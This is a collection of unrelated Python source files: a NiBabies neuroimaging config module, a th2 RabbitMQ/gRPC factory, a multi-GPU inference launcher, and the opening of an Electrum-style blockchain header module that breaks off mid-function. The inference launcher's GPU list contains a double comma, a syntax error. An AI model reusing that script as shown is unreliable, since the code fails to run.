``<output_dir>/sub-<participant_id>/log/<run_unique_id>/nibabies.toml``.
Settings are stored using :abbr:`ToML (Tom's Markup Language)`.
The module has a :py:func:`~nibabies.config.to_filename` function to allow writting out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../nibabies/data/tests/config.toml
:language: toml
:name: nibabies.toml
:caption: **Example file representation of nibabies settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~nibabies.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from nibabies import config
config_file = config.execution.work_dir / '.nibabies.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other conveniency actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
import sys
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
CONFIG_FILENAME = "nibabies.toml"
try:
set_start_method("forkserver")
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import random
from uuid import uuid4
from time import strftime
from pathlib import Path
from nipype import __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
(
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("NIBABIES_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
)
):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("NIBABIES_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/nipreps/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
else:
import logging
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
_exec_env = "singularity"
_cgroup = Path("/proc/1/cgroup")
if _cgroup.exists() and "docker" in _cgroup.read_text():
_docker_ver = os.getenv("DOCKER_VERSION_8395080871")
_exec_env = "nibabies-docker" if _docker_ver else "docker"
del _cgroup
_fs_license = os.getenv("FS_LICENSE")
if not _fs_license and os.getenv("FREESURFER_HOME"):
_fs_home = os.getenv("FREESURFER_HOME")
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(
os.getenv("TEMPLATEFLOW_HOME", os.path.join(os.getenv("HOME"), ".cache", "templateflow"))
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024 ** 3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
if _proc_oc_path.exists():
_oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
_proc_oc_path.read_text().strip(), "unknown"
)
if _oc_policy != "never":
_proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if _oc_limit in ("0", "n/a") and Path("/proc/sys/vm/overcommit_ratio").exists():
_oc_limit = "{}%".format(Path("/proc/sys/vm/overcommit_ratio").read_text().strip())
except Exception:
pass
# Debug modes are names that influence the exposure of internal details to
# the user, either through additional derivatives or increased verbosity
DEBUG_MODES = ("compcor", "registration", "fieldmaps")
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True, ignore=None):
"""Store settings from a dictionary."""
ignore = ignore or {}
for k, v in settings.items():
if k in ignore or v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
elif hasattr(cls, k):
setattr(cls, k, v)
if init and hasattr(cls, "init"):
cls.init()
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *nibabies* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*NiBabies*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = "txt"
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = "MultiProc"
"""NiPype's execution plugin."""
plugin_args = {
"maxtasksperchild": 1,
"raise_insufficient": False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
"plugin": cls.plugin,
"plugin_args": cls.plugin_args,
}
if cls.plugin in ("MultiProc", "LegacyMultiProc"):
out["plugin_args"]["n_procs"] = int(cls.nprocs)
if cls.memory_gb:
out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config(
{
"monitoring": {
"enabled": cls.resource_monitor,
"sample_frequency": "0.5",
"summary_append": True,
}
}
)
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config(
{
"execution": {
"crashdump_dir": str(execution.log_dir),
"crashfile_format": cls.crashfile_format,
"get_linked_libs": cls.get_linked_libs,
"stop_on_first_crash": cls.stop_on_first_crash,
"check_version": False, # disable future telemetry
}
}
)
if cls.omp_nthreads is None:
cls.omp_nthreads = min(cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_database_dir = None
"""Path to the directory containing SQLite database indices for the input BIDS dataset."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
sloppy = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
debug = []
"""Debug mode(s)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
nibabies_dir = None
"""Root of NiBabies BIDS Derivatives dataset. Depends on output_layout."""
notrack = False
"""Do not monitor *nibabies* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_layout = None
"""Layout of derivatives within output_dir."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = f"{strftime('%Y%m%d-%H%M%S')}_{uuid4()}"
"""Unique identifier of this particular run."""
segmentation_atlases_dir = None
"""Directory with atlases to use for JLF segmentations"""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path("work").absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
"anat_derivatives",
"bids_dir",
"bids_database_dir",
"fs_license_file",
"fs_subjects_dir",
"layout",
"log_dir",
"nibabies_dir",
"output_dir",
"segmentation_atlases_dir",
"templateflow_home",
"work_dir",
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout, BIDSLayoutIndexer
_db_path = cls.bids_database_dir or (cls.work_dir / cls.run_uuid / "bids_db")
_db_path.mkdir(exist_ok=True, parents=True)
# Recommended after PyBIDS 12.1
_indexer = BIDSLayoutIndexer(
validate=False,
ignore=(
"code",
"stimuli",
"sourcedata",
"models",
re.compile(r"^\."),
re.compile(
r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/(beh|dwi|eeg|ieeg|meg|perf)"
),
),
)
cls._layout = BIDSLayout(
str(cls.bids_dir),
database_path=_db_path,
reset_database=cls.bids_database_dir is None,
indexer=_indexer,
)
cls.bids_database_dir = _db_path
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4]) if not isinstance(v, Query) and "Query" in v else v
for k, v in filters.items()
}
if "all" in cls.debug:
cls.debug = list(DEBUG_MODES)
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
age_months = None
"""Age (in months)"""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = "register"
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fd_radius = 45
"""Head radius in mm for framewise displacement calculation"""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *nibabies*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "UNCInfant:cohort-1"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*nibabies* will run brain extraction of the T1w)."""
slice_time_ref = 0.5
"""The time of the reference slice to correct BOLD values to, as a fraction
acquisition time. 0 indicates the start, 0.5 the midpoint, and 1 the end
of acquisition. The alias `start` corresponds to 0, and `middle` to 0.5.
The default value is 0.5."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = False
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger("cli")
"""Command-line interface logging."""
workflow = logging.getLogger("nipype.workflow")
"""NiPype's workflow logger."""
interface = logging.getLogger("nipype.interface")
"""NiPype's interface logger."""
utils = logging.getLogger("nipype.utils")
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config(
{"logging": {"log_directory": str(execution.log_dir), "log_to_file": True}}
)
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
_random_seed = None
master = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
@classmethod
def init(cls):
if cls._random_seed is not None:
cls.master = cls._random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ["ANTS_RANDOM_SEED"] = str(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.load(settings)
loggers.init()
def load(filename, skip=None):
"""Load settings from file."""
from toml import loads
skip = skip or {}
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != "environment":
section = getattr(sys.modules[__name__], sectionname)
ignore = skip.get(sectionname)
section.load(configs, ignore=ignore)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
"environment": environment.get(),
"execution": execution.get(),
"workflow": workflow.get(),
"nipype": nipype.get(),
"seeds": seeds.get(),
}
if not flat:
return settings
return {
".".join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()
}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(" ") for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
if workflow.age_months is not None:
from .utils.misc import cohort_by_months
# cohort workaround
if any(
"MNIInfant" in space.split(":")[0]
for space in spaces.get_spaces(nonstandard=False, dim=(3,))
):
cohort = cohort_by_months("MNIInfant", workflow.age_months)
spaces.add(Reference("MNIInfant", {"cohort": cohort}))
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(Reference("MNI152NLin6Asym", {"res": "2"}))
if workflow.cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = "2" if workflow.cifti_output == "91k" else "1"
spaces.add(Reference("fsaverage", {"den": "164k"}))
spaces.add(Reference("MNI152NLin6Asym", {"res": vol_res}))
# Make the SpatialReferences object available
workflow.spaces = spaces
|
abstract_common_factory.py
|
# Copyright 2020-2020 Exactpro (Exactpro Systems Limited)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import threading
from abc import ABC, abstractmethod
from threading import Lock
import pika
from th2_common.schema.cradle.cradle_configuration import CradleConfiguration
from th2_common.schema.event.event_batch_router import EventBatchRouter
from th2_common.schema.grpc.configuration.grpc_router_configuration import GrpcRouterConfiguration
from th2_common.schema.grpc.router.grpc_router import GrpcRouter
from th2_common.schema.grpc.router.impl.default_grpc_router import DefaultGrpcRouter
from th2_common.schema.message.configuration.message_router_configuration import MessageRouterConfiguration
from th2_common.schema.message.impl.rabbitmq.configuration.rabbitmq_configuration import RabbitMQConfiguration
from th2_common.schema.message.impl.rabbitmq.parsed.rabbit_parsed_batch_router import RabbitParsedBatchRouter
from th2_common.schema.message.impl.rabbitmq.raw.rabbit_raw_batch_router import RabbitRawBatchRouter
from th2_common.schema.message.message_router import MessageRouter
logger = logging.getLogger()
class AbstractCommonFactory(ABC):
def __init__(self,
message_parsed_batch_router_class=RabbitParsedBatchRouter,
message_raw_batch_router_class=RabbitRawBatchRouter,
event_batch_router_class=EventBatchRouter,
grpc_router_class=DefaultGrpcRouter) -> None:
self.rabbit_mq_configuration = self._create_rabbit_mq_configuration()
self.message_router_configuration = self._create_message_router_configuration()
self.grpc_router_configuration = self._create_grpc_router_configuration()
self.message_parsed_batch_router_class = message_parsed_batch_router_class
self.message_raw_batch_router_class = message_raw_batch_router_class
self.event_batch_router_class = event_batch_router_class
self.grpc_router_class = grpc_router_class
self._message_parsed_batch_router = None
self._message_raw_batch_router = None
self._event_batch_router = None
self._grpc_router = None
credentials = pika.PlainCredentials(self.rabbit_mq_configuration.username,
self.rabbit_mq_configuration.password)
connection_parameters = pika.ConnectionParameters(virtual_host=self.rabbit_mq_configuration.vhost,
host=self.rabbit_mq_configuration.host,
port=self.rabbit_mq_configuration.port,
credentials=credentials)
self.connection = pika.BlockingConnection(connection_parameters)
self._notifier = threading.Event()
def notify(notifier, timeout):
while not notifier.wait(timeout):
self.connection.process_data_events()
threading.Thread(target=notify, args=(self._notifier, 30)).start()
@property
def message_parsed_batch_router(self) -> MessageRouter:
"""
Created MessageRouter which work with MessageBatch
"""
if self._message_parsed_batch_router is None:
self._message_parsed_batch_router = self.message_parsed_batch_router_class(self.connection,
self.rabbit_mq_configuration,
self.message_router_configuration
)
return self._message_parsed_batch_router
@property
def message_raw_batch_router(self) -> MessageRouter:
"""
Created MessageRouter which work with RawMessageBatch
"""
if self._message_raw_batch_router is None:
self._message_raw_batch_router = self.message_raw_batch_router_class(self.connection,
self.rabbit_mq_configuration,
self.message_router_configuration)
return self._message_raw_batch_router
@property
def event_batch_router(self) -> MessageRouter:
"""
Created MessageRouter which work with EventBatch
"""
if self._event_batch_router is None:
self._event_batch_router = self.event_batch_router_class(self.connection,
self.rabbit_mq_configuration,
self.message_router_configuration)
return self._event_batch_router
@property
def grpc_router(self) -> GrpcRouter:
if self._grpc_router is None:
self._grpc_router = self.grpc_router_class(self.grpc_router_configuration)
return self._grpc_router
def close(self):
logger.info('Closing Common Factory')
if self._message_raw_batch_router is not None:
try:
self._message_raw_batch_router.close()
except Exception:
logger.exception('Error during closing Message Router (Message Raw Batch)')
if self._message_parsed_batch_router is not None:
try:
self._message_parsed_batch_router.close()
except Exception:
logger.exception('Error during closing Message Router (Message Parsed Batch)')
if self._event_batch_router is not None:
try:
self._event_batch_router.close()
except Exception:
logger.exception('Error during closing Message Router (Event Batch)')
if self._grpc_router is not None:
try:
self._grpc_router.close()
except Exception:
logger.exception('Error during closing gRPC Router')
self._notifier.set()
if self.connection is not None and self.connection.is_open:
self.connection.close()
@staticmethod
def read_configuration(filepath):
with open(filepath, 'r') as file:
config_json = file.read()
config_json_expanded = os.path.expandvars(config_json)
config_dict = json.loads(config_json_expanded)
return config_dict
def create_cradle_configuration(self) -> CradleConfiguration:
return CradleConfiguration(**self.read_configuration(self._path_to_cradle_configuration()))
def create_custom_configuration(self) -> dict:
return self.read_configuration(self._path_to_custom_configuration())
def _create_rabbit_mq_configuration(self) -> RabbitMQConfiguration:
lock = Lock()
try:
lock.acquire()
if not hasattr(self, 'rabbit_mq_configuration'):
config_dict = self.read_configuration(self._path_to_rabbit_mq_configuration())
self.rabbit_mq_configuration = RabbitMQConfiguration(**config_dict)
finally:
lock.release()
return self.rabbit_mq_configuration
def _create_message_router_configuration(self) -> MessageRouterConfiguration:
lock = Lock()
with lock:
if not hasattr(self, 'message_router_configuration'):
config_dict = self.read_configuration(self._path_to_message_router_configuration())
self.message_router_configuration = MessageRouterConfiguration(**config_dict)
return self.message_router_configuration
def _create_grpc_router_configuration(self) -> GrpcRouterConfiguration:
lock = Lock()
try:
lock.acquire()
if not hasattr(self, 'grpc_router_configuration'):
config_dict = self.read_configuration(self._path_to_grpc_router_configuration())
self.grpc_router_configuration = GrpcRouterConfiguration(**config_dict)
finally:
lock.release()
return self.grpc_router_configuration
@abstractmethod
def _path_to_rabbit_mq_configuration(self) -> str:
pass
@abstractmethod
def _path_to_message_router_configuration(self) -> str:
pass
@abstractmethod
def _path_to_grpc_router_configuration(self) -> str:
pass
@abstractmethod
def _path_to_cradle_configuration(self) -> str:
pass
@abstractmethod
def _path_to_custom_configuration(self) -> str:
pass
|
multi_inference_20200804111841.py
|
# coding=utf-8
import os
import cv2
import sys
import pdb
import subprocess
import multiprocessing
import inference_utils
import common
def single_process(index, task, gpu):
print(("任务%d处理%d张图片" % (index, len(task))))
# 写文件
filename = inference_utils.dump_testfile(task, index)
out_str = subprocess.check_output(["python", file, "--gpuid=%s" % str(gpu), "--img_list=%s" % filename, "--out_dir=%s" % out_dir, "--batch_size=%d" % batch_size])
print(("任务%d处理完毕!" % (index)))
if "__main__" == __name__:
gpu_list = [1,1,2,2,3,3,4,4,5,5,,6,6,6,7,7,7]
file = "tools/multi_process_inference/inference.py"
img_dir = '/home/songbai.xb/workspace/projects/TAO/data/TAO/frames/train/'
out_dir = './tmp/file/train_nonms_tta/'
batch_size = 1
# 解析dir
img_list = common.load_filepaths(img_dir, suffix=('.jpg', '.png', '.jpeg'), recursive=True)
#names = demo_utils.parse_testfile(testfile)
print(f"总共{len(img_list)}张图片")
# 分任务
task_num = len(gpu_list)
tasks = inference_utils.chunks(img_list, task_num)
# 创建进程
processes=list()
for idx, (task, gpu) in enumerate(zip(tasks, gpu_list)):
processes.append(multiprocessing.Process(target=single_process,args=(idx, task, gpu)))
for process in processes:
process.start()
for process in processes:
process.join()
|
blockchain.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@ecdsa.org
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
import time
from typing import Optional, Dict, Mapping, Sequence
import certifi
from . import util
from .bitcoin import hash_encode, int_to_hex, rev_hex
from .crypto import sha256d
from . import constants
from .util import bfh, bh2u
from .simple_config import SimpleConfig
from .logging import get_logger, Logger
from .kgw import KGW
from .version import ELECTRUM_VERSION
# On Android urllib doesn't have certs by default and need to be explicitly loaded.
if 'ANDROID_DATA' in os.environ:
os.environ['SSL_CERT_FILE'] = certifi.where()
try:
import scrypt
getPoWHash = lambda x: scrypt.hash(x, x, N=1024, r=1, p=1, buflen=32)
except ImportError:
util.print_msg("Warning: package scrypt not available; synchronization could be very slow")
from .scrypt import scrypt_1024_1_1_80 as getPoWHash
_logger = get_logger(__name__)
HEADER_SIZE = 80 # bytes
MAX_TARGET = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
MAX_NBITS = 0x1e0FFFFF
# Start checking POW after block 44877
# http://live.reddcoin.com/block/4253e7618d40aded00d11b664e874245ae74d55b976f4ac087d1a9db2f5f3cda
CHECK_POW_FROM_NTIME = 1394048078
class MissingHeader(Exception):
pass
class InvalidHeader(Exception):
pass
def serialize_header(header_dict: dict) -> str:
s = int_to_hex(header_dict['version'], 4) \
+ rev_hex(header_dict['prev_block_hash']) \
+ rev_hex(header_dict['merkle_root']) \
+ int_to_hex(int(header_dict['timestamp']), 4) \
+ int_to_hex(int(header_dict['bits']), 4) \
+ int_to_hex(int(header_dict['nonce']), 4)
return s
def deserialize_header(s: bytes, height: int) -> dict:
if not s:
raise InvalidHeader('Invalid header: {}'.format(s))
if len(s) != HEADER_SIZE:
raise InvalidHeader('Invalid header length: {}'.format(len(s)))
hex_to_int = lambda s: int.from_bytes(s, byteorder='little')
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['block_height'] = height
return h
def hash_header(header: dict) -> str:
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
return hash_raw_header(serialize_header(header))
def hash_raw_header(header: str) -> str:
return hash_encode(sha256d(bfh(header)))
def pow_hash_header(header):
return hash_encode(getPoWHash(bfh(serialize_header(header))))
# key: blockhash hex at forkpoint
# the chain at some key is the best chain that includes the given hash
blockchains = {} # type: Dict[str, Blockchain]
blockchains_lock = threading.RLock() # lock order: take this last; so after Blockchain.lock
def read_blockchains(config: 'SimpleConfig'):
best_chain = Blockchain(config=config,
forkpoint=0,
parent=None,
forkpoint_hash=constants.net.GENESIS,
prev_hash=None)
blockchains[constants.net.GENESIS] = best_chain
# consistency checks
if best_chain.height() > constants.net.max_checkpoint():
header_after_cp = best_chain.read_header(constants.net.max_checkpoint()+1)
if not header_after_cp or not best_chain.can_connect(header_after_cp, check_height=False):
_logger.info("[blockchain] deleting best chain. cannot connect header after last cp to last cp.")
os.unlink(best_chain.path())
best_chain.update_size()
# forks
fdir = os.path.join(util.get_headers_dir(config), 'forks')
util.make_dir(fdir)
# files are named as: fork2_{forkpoint}_{prev_hash}_{first_hash}
l = filter(lambda x: x.startswith('fork2_') and '.' not in x, os.listdir(fdir))
l = sorted(l, key=lambda x: int(x.split('_')[1])) # sort by forkpoint
def delete_chain(filename, reason):
_logger.info(f"[blockchain] deleting chain {filename}: {reason}")
os.unlink(os.path.join(fdir, filename))
def instantiate_chain(filename):
